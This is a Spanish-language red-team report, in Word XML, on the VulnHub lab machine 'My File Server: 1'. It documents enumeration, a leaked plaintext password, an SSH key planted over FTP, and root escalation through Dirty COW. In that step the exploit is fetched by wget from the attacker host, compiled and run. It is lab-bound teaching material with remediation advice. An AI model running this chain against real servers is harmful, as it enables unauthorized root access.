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f3b63"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">INFORME TÉCNICO DE PRUEBAS DE PENETRACIÓN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sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Red Team Assessment — My File Server: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Evaluación de seguridad ofensiva de un servidor de archivos corporativo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1f3b63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63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Consejo Corporativo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My File Server: 1 (máquina vulnerable — entorno de laboratorio)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Dirección IP analizada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192.168.153.128 /24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Máquina atacante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Kali Linux — 192.168.153.129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Trejo Salazar Manuel Darío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— Analista Red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Fecha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30 de septiembre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Versión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1.0 —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Clasificación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CONFIDENCIAL — Uso interno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2. Resumen Ejecutivo</w:t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Durante el engagement de pruebas de penetración ejecutado contra el servidor objetivo "My File Server: 1", el equipo Red Team logró comprometer completamente el sistema: obtuvo acceso remoto con el usuario smbuser y escaló privilegios hasta obtener control total como superusuario (root). La intrusión se materializó mediante una cadena de tres debilidades de baja complejidad que, en conjunto, representan un riesgo CRÍTICO: (1) credenciales válidas expuestas públicamente en el servidor web (/readme.txt), (2) servicios de transferencia de archivos (FTP/SMB) accesibles sin autenticación y con permisos de escritura, y (3) un kernel del sistema operativo sin parchear, vulnerable a la escalada de privilegios conocida como Dirty COW (CVE-2016-5195).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El tiempo total de compromiso fue inferior a una sesión de trabajo. No se requirió ingeniería social, malware personalizado ni explotación de vulnerabilidades de día cero: todos los vectores utilizados son conocidos públicamente y cuentan con herramientas de explotación disponibles, por lo que cualquier actor de amenazas con motivación mínima podría replicar el ataque.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Resultados clave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Nivel de riesgo general evaluado: CRÍTICO (CVSS 9.0–10.0 en la cadena de ataque).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hallazgos documentados: 2 críticos, 2 altos y 3 medios.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Compromiso total de la confidencialidad, integridad y disponibilidad del servidor (modelo CIA).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Exfiltración potencial de toda la información almacenada, incluidos archivos sensibles y credenciales del sistema.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Escalada de privilegios hasta root mediante CVE-2016-5195, con exploit público (Exploit-DB 40616).</w:t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Recomendación principal: se recomienda declarar la remediación como prioridad inmediata — aislar el servidor de la red de producción, aplicar el parche del kernel y deshabilitar el acceso anónimo (FTP, SMB y NFS). El roadmap de remediación propuesto en la sección 10 permite reducir el riesgo a niveles aceptables en un horizonte de 30 días.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3. Alcance (Scope)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3.1 Objetivos en alcance</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table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f3b63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63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63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Servidor My File Server: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192.168.153.128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Servidor de archivos Linux (CentOS 7, kernel 3.10.0-229.el7). Máquina virtual de laboratorio VulnHub que simula un entorno corporativo.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192.168.153.0/24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Segmento NAT aislado de laboratorio (VMware VMnet); sin sistemas de producción.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3.2 Fuera de alcance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Cualquier sistema fuera del segmento 192.168.153.0/24.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Ataques de denegación de servicio (DoS) prolongados contra la disponibilidad del laboratorio.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Ingeniería social, phishing físico o contacto con personal de la organización.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3.3 Reglas de compromiso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actividad se realizó en laboratorio aislado y autorizado con fines educativos.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pruebas se limitaron a identificar, explotar y documentar vulnerabilidades; no se alteró información de forma destructiva.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evidencias (capturas, comandos y salidas) se preservaron íntegramente en este informe.</w:t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3.4 Período de ejecución</w:t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El assessment se ejecutó los días 29 y 30 de septiembre de 2026, con fases de reconocimiento, enumeración, explotación y post-explotación ejecutadas de forma continua.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4. Metodología Aplicada</w:t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El engagement siguió una metodología estructurada alineada con PTES (Penetration Testing Execution Standard) y buenas prácticas OSSTMM, organizada en cinco fases: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f3b63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63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63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Herramientas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Reconocimiento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Descubrir hosts activos, puertos, servicios y versiones; perfilar el sistema operativo.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arp-scan, netdiscover, nmap (-p-, -A, scripts NSE)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Enumeración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Obtener información sensible: usuarios, recursos compartidos, archivos expuestos, configuraciones débiles.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smbmap, nikto, ftp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Explotación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Abusar de las debilidades identificadas para obtener acceso inicial al sistema.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Credenciales expuestas, inyección de clave SSH por FTP, OpenSSH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Post-explotación / Escalada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Consolidar el acceso y elevar privilegios hasta root; recolectar evidencias.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wget, gcc, searchsploit, Exploit-DB 40616 (Dirty COW)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Análisis y reporte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Evaluar impacto (modelo CIA), cuantificar riesgo y formular recomendaciones.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Matriz de riesgo, CVSS v3.1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5. Fases de Reconocimiento</w:t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5.1 Preparación del entorno y descubrimiento de hosts</w:t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Se verificó la configuración de red de la máquina atacante (Kali Linux, 192.168.153.129/24) y se identificó el objetivo activo dentro del segmento mediante ARP scanning con arp-scan y netdiscover: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2f2f2" w:val="clear"/>
        <w:spacing w:after="16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$ sudo systemctl restart networking</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">$ ip a</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"># eth0: inet 192.168.153.129/24</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">$ sudo arp-scan -l</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">192.168.153.1    00:50:56:c0:00:01    VMware, Inc.</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">192.168.153.128  00:0c:29:dd:c8:7d    VMware, Inc.   &lt;-- objetivo</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">192.168.153.254  00:50:56:e5:68:57    VMware, Inc.</w:t>
        <w:br w:type="textWrapping"/>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">$ netdiscover -i eth0 -r 192.168.153.0/24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3969814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69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1. Configuración de red de Kali y descubrimiento de hosts con arp-scan.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754880" cy="2310321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10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2. Confirmación del host activo 192.168.153.128 con netdiscover.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5.2 Escaneo de puertos y servicios</w:t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Se ejecutó un escaneo agresivo de todos los puertos TCP con detección de versiones, sistema operativo y scripts NSE de vulnerabilidad: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2f2f2" w:val="clear"/>
        <w:spacing w:after="16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$ nmap -p- -A 192.168.153.128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Superficie de ataque identificada (escaneo de 157 segundos):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f3b63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63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63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 / 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63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21/tcp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FTP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vsftpd 3.0.2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 anónimo permitido; directorio "pub" con permisos de escritura (drwxrwxrwx)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22/tcp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OpenSSH 7.4 (protocol 2.0)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Acceso remoto cifrado; vector de acceso como usuario válido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80/tcp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Apache httpd 2.4.6 (CentOS)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Sitio "My File Server"; método TRACE activo; sin cabeceras de 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111/tcp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rpcbind 2-4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Requerido por NFS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445/tcp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SMB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Samba smbd 4.9.1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Workgroup SAMBA; recurso compartido expuesto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2049/tcp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nfs_acl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de archivos de red accesible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2121/tcp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FTP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ProFTPD 1.3.5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Segundo servicio FTP; login anónimo permitido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20048/tcp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mountd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1-3 (RPC #100005)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Montaje NFS expuesto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Detección de sistema operativo: Linux 3.4–3.10 (98% de confianza), host FILESERVER. La superficie expuesta (8 puertos, 3 protocolos de transferencia de archivos) sugiere una configuración orientada a compartición de archivos con controles de acceso débiles. Adicionalmente se observó un cortafuegos local que filtra el resto del rango de puertos (77 puertos "host-prohibited").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120640" cy="429758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97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3. Escaneo Nmap (parte 1): FTP anónimo, SSH, HTTP con TRACE activo y rpcbind.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120640" cy="4662221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662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4. Escaneo Nmap (parte 2): Samba, NFS, ProFTPD anónimo, detección de SO y scripts SMB.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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">6. Enumeración</w:t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6.1 Enumeración SMB — divulgación de usuarios y permisos excesivos</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008E">
      <w:pPr>
        <w:shd w:fill="f2f2f2" w:val="clear"/>
        <w:spacing w:after="16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$ smbmap -H 192.168.153.128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El recurso compartido smbdata es accesible con permisos de LECTURA y ESCRITURA sin credenciales válidas (sesión NULL), y su comentario revela el nombre de usuario local "smbuser" — una divulgación de información que facilita la fase de explotación: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f3b63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63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63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print$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Printer Drivers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smbdata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READ, WRITE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smbdata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smbuser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smbuser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IPC$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IPC Service (Samba 4.9.1)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754880" cy="281829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18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5. smbmap: recurso smbdata con permisos de lectura/escritura en sesión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tl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">6.2 Enumeración web — exposición de credenciales</w:t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El análisis con Nikto sobre el puerto 80 reveló, entre otras debilidades (Apache 2.4.6 desactualizado, método TRACE activo y vulnerable a XST, ausencia de cabeceras de seguridad: HSTS, CSP, X-Content-Type-Options, Referrer-Policy, Permissions-Policy), el archivo /readme.txt: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2f2f2" w:val="clear"/>
        <w:spacing w:after="16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$ nikto -h 192.168.153.128</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">+ [003227] /readme.txt: This might be interesting...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Al acceder a http://192.168.153.128/readme.txt se expone una contraseña en texto plano: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2f2f2" w:val="clear"/>
        <w:spacing w:after="16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My Password is rootroot1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159768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97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6. Nikto: Apache desactualizado, TRACE activo, cabeceras ausentes y /readme.txt.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120640" cy="1605216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605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7. Evidencia clave: credencial expuesta en http://192.168.153.128/readme.txt.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r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">6.3 Enumeración FTP</w:t>
      </w:r>
    </w:p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El escaneo Nmap confirmó que el puerto 21 (vsftpd 3.0.2) acepta login anónimo con el directorio "pub" escribible, y el puerto 2121 (ProFTPD 1.3.5) también permite acceso anónimo. Con el par usuario/contraseña obtenido (smbuser / rootroot1) se consolidó el vector principal de acceso, validado en la sección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r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">7. Explotación — Acceso inicial al sistema</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AF">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">7.1 Validación de credenciales y vector elegido</w:t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Las credenciales obtenidas (smbuser / rootroot1) fueron validadas contra el servicio FTP de la víctima. Se optó por un vector alterno al acceso SSH directo con contraseña: la **inyección de una clave pública SSH autorizada** mediante FTP, abusando de que el servicio vsftpd acepta las credenciales de smbuser y da acceso a su directorio personal — evidencia de que la cuenta utiliza la misma contraseña débil en múltiples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r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">7.2 Generación e inyección de clave SSH</w:t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Generación del par de claves en la máquina atacante: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2f2f2" w:val="clear"/>
        <w:spacing w:after="16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$ ssh-keygen -t rsa</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Your identification has been saved in /root/.ssh/id_rsa</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Your public key has been saved in /root/.ssh/id_rsa.pub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291840" cy="4173481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173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8. Generación del par de claves RSA en Kali.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Acceso FTP con las credenciales obtenidas e inyección de la clave pública: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2f2f2" w:val="clear"/>
        <w:spacing w:after="16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$ ftp 192.168.153.128</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Name: smbuser   Password: rootroot1  --&gt; 230 Login successful.</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">ftp&gt; pwd  --&gt;  Remote directory: /home/smbuser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108960" cy="194208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942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9. Login FTP exitoso con smbuser / rootroot1.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206240" cy="104759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047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10. Directorio inicial del usuario: /home/smbuser.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Durante la inyección se constató que el directorio ~/.ssh no existía en la cuenta (error 550), por lo que fue necesario crearlo antes de subir la clave — detalle que refuerza que el servidor carece de hardening incluso en sus cuentas de usuario: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2f2f2" w:val="clear"/>
        <w:spacing w:after="16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ftp&gt; mkdir .ssh            --&gt; 257 "/home/smbuser/.ssh" created</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">ftp&gt; cd .ssh               --&gt; 250 Directory successfully changed.</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">ftp&gt; put /root/.ssh/id_rsa.pub authorized_keys  --&gt; 226 Transfer complete.</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">ftp&gt; ls                    --&gt; authorized_keys (563 bytes)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840480" cy="3914247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914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11. Creación de ~/.ssh e inyección de la clave pública como authorized_keys.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7.3 Acceso remoto sin contraseña</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C1">
      <w:pPr>
        <w:shd w:fill="f2f2f2" w:val="clear"/>
        <w:spacing w:after="16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$ ssh smbuser@192.168.153.128</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"># Banner: Armour Infosec --- My File Server - 1</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">$ whoami  --&gt; smbuser</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">$ id      --&gt; uid=1000(smbuser) gid=1000(smbuser) grupos=1000(smbuser)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">$ uname -a --&gt; Linux fileserver 3.10.0-229.el7.x86_64 #1 SMP Fri Mar 6 11:36:42 UTC 2015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Evidencia de compromiso: sesión interactiva obtenida como usuario smbuser (uid=1000). La persistencia queda garantizada mientras exista la clave autorizada, incluso si se rota la contraseña.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120640" cy="2680564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805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12. Acceso SSH sin contraseña: whoami, id y uname -a en la víctima.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r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">8. Escalada de Privilegios — De usuario a root</w:t>
      </w:r>
    </w:p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tl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">8.1 Identificación de la vulnerabilidad</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C8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El kernel 3.10.0-229.el7 (CentOS 7, compilado en marzo de 2015) no incorpora el parche de la vulnerabilidad CVE-2016-5195 (Dirty COW), una condición de carrera en el subsistema de memoria del kernel (PTRACE_POKEDATA) que permite a un usuario sin privilegios escribir sobre archivos de solo lectura, como /usr/bin/passwd o /etc/passwd, elevando privilegios a root.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r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">8.2 Obtención del exploit y transferencia</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CA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Desde Kali se localizó el exploit público en la base de datos Exploit-DB y se sirvió por HTTP hacia la víctima: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2f2f2" w:val="clear"/>
        <w:spacing w:after="16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# Kali (terminal 2):</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">$ searchsploit -m 40616</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Copied to: /home/rinzler/40616.c</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">$ python3 -m http.server 8000</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Serving HTTP on 0.0.0.0 port 8000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754880" cy="2791308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91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13. Descarga del exploit 40616.c con searchsploit y servidor HTTP en Kali.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r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">8.3 Explotación</w:t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Desde la sesión SSH como smbuser se descargó, compiló y ejecutó el exploit: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2f2f2" w:val="clear"/>
        <w:spacing w:after="16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$ wget http://192.168.153.129:8000/40616.c   --&gt; 200 OK, 40616.c guardado [4803/4803]</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">$ gcc 40616.c -o cowroot -pthread            --&gt; (solo advertencias, sin errores)</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">$ ls -l cowroot                             --&gt; -rwxrwxr-x 1 smbuser smbuser 14291 ... cowroot</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">$ ./cowroot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3115762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5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14. Descarga del exploit desde Kali y compilación con gcc en la víctima.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Al tratarse de una condición de carrera, la primera ejecución no ganó la carrera entre hilos del kernel ("thread stopped" sin sobreescritura) y fue necesario reintentar. En la segunda ejecución el exploit sobreescribió /usr/bin/passwd y otorgó la shell de root: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2f2f2" w:val="clear"/>
        <w:spacing w:after="16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$ ./cowroot</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">DirtyCow root privilege escalation</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Backing up /usr/bin/passwd.. to /tmp/bak</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Racing, this may take a while..</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">thread stopped</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">thread stopped</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">/usr/bin/passwd is overwritten</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Popping root shell.</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Don't forget to restore /tmp/bak</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">[root@fileserver smbuser]# id</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">uid=0(root) gid=1000(smbuser) groups=0(root),1000(smbuser)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937760" cy="1314844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314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15. Ejecución del exploit: primer intento fallido (carrera perdida) y segundo intento exitoso con uid=0(root).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120640" cy="4046957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46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16. Flujo completo de escalada: wget, gcc, cowroot y shell de root.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r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">8.4 Prueba de compromiso total</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DA">
      <w:pPr>
        <w:shd w:fill="f2f2f2" w:val="clear"/>
        <w:spacing w:after="16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[root@fileserver smbuser]# cd /root</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">[root@fileserver root]# ls</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">proof.txt</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">[root@fileserver root]# cat proof.txt</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Best of Luck</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">af52e0163b03cbf7c6dd146351594a43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Evidencia de compromiso total: shell con uid=0(root) y lectura del archivo de prueba /root/proof.txt, accesible únicamente para el superusuario.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108960" cy="2433872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433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17. Lectura de /root/proof.txt: flag de compromiso total del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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">9. Análisis de Impacto (Modelo CIA)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table6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f3b63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63" w:val="clea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63" w:val="clea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Justificación técnica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Confidencialidad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/ COMPROMETIDA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root implica lectura total: archivos compartidos por SMB/FTP/NFS, configuraciones, hashes de /etc/shadow, historiales y cualquier dato almacenado. Las credenciales expuestas en readme.txt evidencian una cultura de manejo inseguro de secretos.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/ COMPROMETIDA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recurso smbdata y el directorio FTP pub permiten escritura anónima; con root, un atacante puede alterar, borrar o reemplazar cualquier archivo (incluidos binarios del sistema), instalar puertas traseras o modificar registros para borrar huellas.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MEDIA-ALTA / COMPROMETIDA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control root permite detener servicios, cifrar o destruir información (escenario tipo ransomware sobre el servidor de archivos) o causar denegación de servicio. La exposición de NFS y SMB amplía los vectores de interrupción.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Conclusión del análisis: el servidor de archivos quedó completamente comprometido en sus tres dimensiones. En un contexto empresarial real, esto equivale a pérdida de información confidencial, manipulación de evidencias/documentos y parada potencial del servicio de almacenamiento.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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">10. Recomendaciones Técnicas</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table7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1f3b63" w:val="clea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63" w:val="clea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Recomendación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63" w:val="clea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Hallazgo que remedia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63" w:val="clea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Actualizar el kernel a una versión parcheada posterior a CVE-2016-5195 (o aplicar el parche de Red Hat/CentOS) y establecer un proceso de gestión de parches.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Inmediata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Eliminar toda credencial en archivos accesibles por el servidor web; retirar /readme.txt; implementar un gestor de secretos y política de contraseñas robustas.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Inmediata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Deshabilitar el acceso anónimo en vsftpd (anonymous_enable=NO) y ProFTPD; eliminar permisos de escritura en directorios públicos.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H-02, H-03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Inmediata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Restringir el recurso smbdata con autenticación robusta, principio de mínimo privilegio y, de ser posible, SMB firmado/cifrado.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Restringir NFS por IP mediante /etc/exports (rw solo a hosts autorizados), desactivar en redes no confiables y aplicar firewall.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Actualizar Apache httpd y desactivar el método TRACE; añadir cabeceras de seguridad (X-Frame-Options, X-Content-Type-Options, HSTS).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Auditar y eliminar claves SSH autorizadas no pertenecientes al personal legítimo; habilitar autenticación de dos factores y alertado de nuevas claves.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Cadena de explotación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Segmentar la red del servidor de archivos (VLAN dedicada), aplicar firewall (iptables/nftables) permitiendo solo puertos estrictamente necesarios y desplegar monitoreo/IDS.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Superficie de ataque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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">11. Tabla de Hallazgos</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table8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1f3b63" w:val="clea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63" w:val="clea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Vulnerabilidad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63" w:val="clea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63" w:val="clea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63" w:val="clea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63" w:val="clea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Recomendación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Exposición de credenciales válidas en archivo público del servidor web (readme.txt: usuario smbuser / contraseña rootroot1).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GET http://192.168.153.128/readme.txt → "My Password is rootroot1" (Fig. 7); usuario revelado por comentario del share SMB (Fig. 5).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Acceso inicial garantizado a servicios internos; compromiso de confidencialidad.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Eliminar el archivo; gestor de secretos; política de contraseñas (R2).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FTP (vsftpd 3.0.2, 21/tcp) con acceso anónimo habilitado y directorio "pub" con permisos de escritura (drwxrwxrwx).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nmap: "Anonymous FTP login allowed (FTP code 230) ... pub [NSE: writeable]" (Fig. 3).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Almacenamiento de contenido ilícito, malware o inyección de claves SSH (vector utilizado).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anonymous_enable=NO; permisos restrictivos (R3).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Segundo servicio FTP (ProFTPD 1.3.5, 2121/tcp) con acceso anónimo habilitado.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nmap: "Anonymous FTP login allowed (FTP code 230)" en puerto 2121 (Fig. 4).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Divulgación de información de logs; ampliación de superficie de ataque.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Deshabilitar acceso anónimo o el servicio si no es necesario (R3).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Recurso compartido SMB smbdata accesible sin autenticación con permisos de lectura y escritura; divulgación del usuario smbuser.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smbmap -H 192.168.153.128 → smbdata READ, WRITE; comentario "smbuser" (Fig. 5).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Lectura/exfiltración y alteración de archivos corporativos; fuga de nombres de usuario.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Autenticación SMB, mínimo privilegio, SMB firmado (R4).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Kernel Linux 3.10.0-229.el7 sin parchear, vulnerable a Dirty COW (CVE-2016-5195) — escalada de privilegios a root.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uname -a → 3.10.0-229.el7 (Fig. 12); id → uid=0(root) tras Exploit-DB 40616 (Fig. 15–16); proof.txt leído (Fig. 17).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Compromiso total del sistema (root); pérdida de las tres dimensiones CIA.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Parchear kernel; proceso continuo de gestión de vulnerabilidades (R1).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Apache httpd 2.4.6 desactualizado, método TRACE activo y ausencia de cabeceras de seguridad.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nikto: "Apache/2.4.6 appears to be outdated", "HTTP TRACE method is active... vulnerable to XST", cabeceras faltantes (Fig. 6).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XST/XSS potenciales; fingerprinting facilitado a atacantes.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Actualizar Apache; desactivar TRACE; cabeceras de seguridad (R6).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Servicio NFS (2049/tcp) y mountd (20048/tcp) expuestos sin restricciones de red.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nmap: nfs_acl 3 (RPC #100227), mountd 1-3 abiertos (Fig. 3–4).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Montaje potencial de recursos desde la red; vector de lectura/escritura remota.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Restringir exports por IP; firewall; deshabilitar si no es necesario (R5).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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Anexo A — Evidencias complementarias del laboratorio</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000149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Pantalla de arranque de la máquina objetivo (banner Armour Infosec — My File Server: 1, CentOS 7, kernel 3.10.0-229.el7) y entorno de trabajo con ambas máquinas virtuales desplegadas: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177209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72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A1. Banner de arranque de My File Server: 1 (consola del servidor).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120640" cy="2783622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83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A2. Entorno de laboratorio: máquina víctima y Kali Linux activas en VMware.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rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Fin del informe. Documento generado con fines educativos en entorno de laboratorio aislado.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3b63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3b63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3b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8.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10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9.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13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